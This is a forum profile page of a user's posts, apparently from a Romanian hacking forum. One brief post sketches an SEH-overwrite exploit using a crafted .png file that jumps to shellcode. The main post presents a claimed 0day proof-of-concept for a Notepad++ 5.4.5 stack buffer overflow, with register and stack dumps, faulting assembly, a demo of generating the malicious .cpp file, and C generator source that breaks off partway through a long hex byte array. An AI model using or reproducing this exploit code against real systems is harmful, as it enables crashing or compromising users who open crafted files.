fl0 fl0w
-
Posts
72 -
Joined
-
Last visited
-
Days Won
3
fl0 fl0w's Achievements
-
# Buffer overflow simplu cand deschizi un fisier .png special un SEH handler este suprascris, # apoi trebuie decat sa scot 8 bytes din stack,si RET instructiune ce imi pune ultimi 4 bytes # in EIP ,acesti 4 bytes o sa fie o instructiune JMP 10 bytes peste zona corrupta pe [nop] si apoi [shellcode]. # Video test 0day # Download phtst.rar Cod: cpp private pastebin - collaborative debugging tool
-
- 1
-
-
Asta e important si pentru voi. /* ************************************************************** (0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC* by fl0 fl0w * ************************************************************** */ /***************************************************************************************************** LATEST FIXES * Notepad++ v5.4.5 fixed bugs (from v5.4.4) : * 1. Fix plugins shortcuts not working bug. * 2. Fix the tooltip on toolbar display bug for the plugins icons. * 3. Fix a crash that was occurring when searching in files from a deep path. * 4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.* 5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml). * 6. Add SQL folding capacity. * ****************************************************************************************************** */ /*************************************************************************** This is the latest version of notepad++. * As you can see no buffer overflow bug is mentioned to exist or to be fixed.* **************************************************************************** */ /*********************************************************** DEBUGGING INFORMATION * CPU REGISTERS * EAX 00000000 * ECX 003B74C4 * EDX 00000000 * EBX 0999A999 * ESP 000E0764 * EBP 000E0834 * ESI 00B3D760 * EDI 003B74B0 * EIP 1000A258 SciLexer.1000A258 * * Function SciLexer() is causing this bug. * Let's look at the assembly instructions: * * ASSEMBLY INSTRUCTIONS * 1000A258 8910 MOV DWORD PTR DS:[EAX],EDX * 1000A25A 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] * 1000A25D 8B80 60090000 MOV EAX,DWORD PTR DS:[EAX+960] * 1000A263 8B80 B0010000 MOV EAX,DWORD PTR DS:[EAX+1B0] * 1000A269 0FAF81 24060000 IMUL EAX,DWORD PTR DS:[ECX+624]* 1000A270 2055 FF AND BYTE PTR SS:[EBP-1],DL * 1000A273 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX * 1000A276 8B41 10 MOV EAX,DWORD PTR DS:[ECX+10] * 1000A279 05 6C0B0000 ADD EAX,0B6C * 1000A27E 8945 CC MOV DWORD PTR SS:[EBP-34],EAX * 1000A281 33C0 XOR EAX,EAX * 1000A283 6A 1F PUSH 1F * 1000A285 59 POP ECX * * EDX=00000000 * DS:[00000000]=??? * ************************************************************ */ /************************************************************* STACK * 000BFEB4 004956A0 notepad+.004956A0 * 000BFEB8 F74B257B * 000BFEBC FFFFFFFE * 000BFEC0 58585858 * 000BFEC4 58585858 * 000BFEC8 58585858q * 000BFECC 58585858 * 000BFED0 58585858 * 000BFED4 58585858 * 000BFED8 58585858 * 000BFEDC 58585858 * 000BFEE0 58585858 * 000BFEE4 58585858 * 000BFEE8 58585858 * 000BFEEC 58585858 * 000BFEF4 58585858 * 000BFEF8 58585858 * 000BFEFC 58585858 * 000BFF00 58585858 * 000BFF04 58585858 * 000BFF0C 58585858 * 000BFF10 58585858 * ….................................. * Tested succesfull on Microsoft Windows XP Service Pack 3. * To test the exploit(notepad++.c) you need to compile it * with cygwin console or linux environment. * If you want to test the executable(test.exe)you need to * copy the cygwin1.dll in the same folder as the executable. * Notepad++ 5.4.5 crashes in a STACK BUFFER OVERFLOW when a * specialy crafted .C/CPP file is opened.You can right click * the file and select ->edit with notepad++ or just click open.* Compiled with cygwin console * For more debugging info (screenshots) * Download the files from * RapidShare: 1-CLICK Web hosting - Easy Filehosting * 2shared - download notepad++ POC.zip Download notepad++ POC.zip * Download notepad++ POC zip GigaSize.com: Host and Share your Files * **************************************************************/ /***************************************************************************************************************************** DEMO * I'm in the cygwin console * $gcc notepad++.c -o notepad * * Now I want to run the .exe from * CMD console so I copy the cygwin1.dll * in my folder and run it. * * C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir * Volume in drive C is System * Volume Serial Number is A06E-304B * * Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC * * 2009/09/16 01:13 PM <DIR> . * 2009/09/16 01:13 PM <DIR> .. * 2008/06/12 08:35 PM 1,872,884 cygwin1.dll * 2009/09/14 03:09 PM 100,004,279 fffile.cpp * 2009/09/16 01:13 PM 18,042 note.exe * 2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt * 2009/09/16 01:11 PM 36,923 notepad++.c * 2009/09/11 01:40 PM 192,747 screen1.JPG * 2009/09/11 01:44 PM 224,376 screen2.JPG * 2009/09/12 08:37 PM 443,304 screen3.JPG * 8 File(s) 102,804,872 bytes * 2 Dir(s) 4,864,954,368 bytes free * * C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe * ************************************************* * Notepad++ 5.4.5 Stack Buffer Overflow * Usage is:note [option1] filename * CREDITS:fl0 fl0w * This POC is PRIVATE * ************************************************* * Example: * * -f FILE.c/cpp * * C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe -f test.cpp * FILE DONE ! * path/location of the crafted file is: /cygdrive/c/Documents and Settings/Stefan/ * Desktop/notepad++ POC/ * * C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir * Volume in drive C is System * Volume Serial Number is A06E-304B * * Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC * * 2009/09/16 01:18 PM <DIR> . * 2009/09/16 01:18 PM <DIR> .. * 2008/06/12 08:35 PM 1,872,884 cygwin1.dll * 2009/09/14 03:09 PM 100,004,279 fffile.cpp * 2009/09/16 01:13 PM 18,042 note.exe * 2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt * 2009/09/16 01:11 PM 36,923 notepad++.c * 2009/09/11 01:40 PM 192,747 screen1.JPG * 2009/09/11 01:44 PM 224,376 screen2.JPG * 2009/09/12 08:37 PM 443,304 screen3.JPG * 2009/09/16 01:18 PM 100,004,279 test.cpp <--------------------------here you go now open it with notepad++ 5.4.5 * 9 File(s) 202,809,151 bytes * 2 Dir(s) 4,746,797,056 bytes free * ****************************************************************************************************************************** */ #include "stdio.h" #include "string.h" #include "windows.h" #include "getopt.h" #include "stdint.h" #include <fcntl.h> #include <io.h> #define R 0x10 #define RR 0x1F #define SS 0x80 void CLS(int num_lines) { int n; for(n = 0; n < num_lines; n++) puts(""); } char checksum(char data[10000], char len) { uint32_t sum1 = 0xffff, sum2 = 0xffff; while (len) { unsigned tlen = len > 360 ? 360 : len; len -= tlen; do { sum1 += *data++; sum2 += sum1; } while (--tlen); sum1 = (sum1 & 0xffff) + (sum1 >> 16); sum2 = (sum2 & 0xffff) + (sum2 >> 16); } sum1 = (sum1 & 0xffff) + (sum1 >> 16); sum2 = (sum2 & 0xffff) + (sum2 >> 16); return sum2 << 16 | sum1; } void Buildfile(char *fname) { char V[] = { 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74, 0x64, 0x69, 0x6F, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x67, 0x65, 0x74, 0x6F, 0x70, 0x74, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74, 0x64, 0x69, 0x6E, 0x74, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20, 0x53, 0x74, 0x61, 0x72, 0x74, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x74, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x48, 0x54, 0x4D, 0x4C, 0x3B, 0x0D, 0x0A, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20, 0x4D, 0x69, 0x64, 0x64, 0x6C, 0x65, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x65, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x61, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x09, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x09, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x48, 0x45, 0x41, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20, 0x45, 0x6E, 0x64, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x62, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6F, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x79, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x42, 0x4F, 0x44, 0x59, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x30, 0x78, 0x31, 0x41, 0x30, 0x41, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x20, 0x20, 0x32, 0x39, 0x41, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x53, 0x52, 0x43, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x22, 0x3C, 0x69, 0x6D, 0x67, 0x20, 0x73, 0x72, 0x63, 0x3D, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x76, 0x6F, 0x69, 0x64, 0x20, 0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x20, 0x48, 0x54, 0x4D, 0x4C, 0x20, 0x2A, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x48, 0x45, 0x41, 0x44, 0x20, 0x2A, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x42, 0x4F, 0x44, 0x59, 0x20, 0x2A, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x22, 0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x35, 0x34, 0x5C, 0x78, 0x34, 0x44, 0x5C, 0x78, 0x34, 0x43, 0x22, 0x20, 0x20, 0x2D, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x54, 0x4D, 0x4C, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48, 0x54, 0x4D, 0x4C, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x45, 0x41, 0x44, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48, 0x45, 0x41, 0x44, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20, 0x3D, 0x20, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20, 0x3D, 0x20, 0x28, 0x63, 0x68, 0x61, 0x72, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x74, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x35, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x6D, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x6C, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x43, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x73, 0x65, 0x63, 0x6F, 0x6E, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x48, 0x45, 0x41, 0x44, 0x20, 0x22, 0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x34, 0x35, 0x5C, 0x78, 0x34, 0x31, 0x5C, 0x78, 0x34, 0x34, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x65, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x35, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x61, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x64, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x74, 0x68, 0x69, 0x65, 0x72, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x22, 0x5C, 0x78, 0x34, 0x32, 0x5C, 0x78, 0x34, 0x46, 0x5C, 0x78, 0x34, 0x34, 0x5C, 0x78, 0x35, 0x39, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x62, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x32, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x6F, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x46, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x44, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x79, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x35, 0x39, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x20, 0x2A, 0x66, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x20, 0x3D, 0x20, 0x66, 0x6F, 0x70, 0x65, 0x6E, 0x28, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x2C, 0x20, 0x22, 0x77, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x20, 0x66, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x33, 0x32, 0x5F, 0x74, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x3D, 0x20, 0x30, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 